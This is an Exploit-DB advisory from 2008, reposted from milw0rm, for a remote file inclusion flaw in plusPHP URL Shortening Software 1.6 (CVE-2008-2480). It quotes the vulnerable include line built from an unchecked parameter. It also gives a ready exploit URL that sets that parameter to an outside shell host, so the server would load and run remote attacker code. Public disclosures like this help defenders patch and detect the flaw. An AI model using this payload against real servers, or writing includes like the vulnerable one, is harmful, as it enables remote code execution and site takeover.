plusphp url shortening software 1.6 - Remote File Inclusion Vulnerability

2008-05-25T00:00:00
ID EDB-ID:5672
Type exploitdb
Reporter DR.TOXIC
Modified 2008-05-25T00:00:00

Description

plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability. CVE-2008-2480. Webapps exploit for php platform

                                        
                                            Author: DR.TOXIC  / dr.toxic@windowslive.com
 
Title: plusPHP Multi-User Short URL and Statistics (plus.php) RFI Vulnerability
Script Download: http://www.hotscripts.com/jump.php?listing_id=80293&jump_type=1
Vulnerability Code: (plus.php) "include ($_pages_dir.'_config.php');"
Example;
http://localhost/plus.php?_pages_dir=http://SH3LL?
<--------------------Milw0rm Exploits-------------------->

# milw0rm.com [2008-05-25]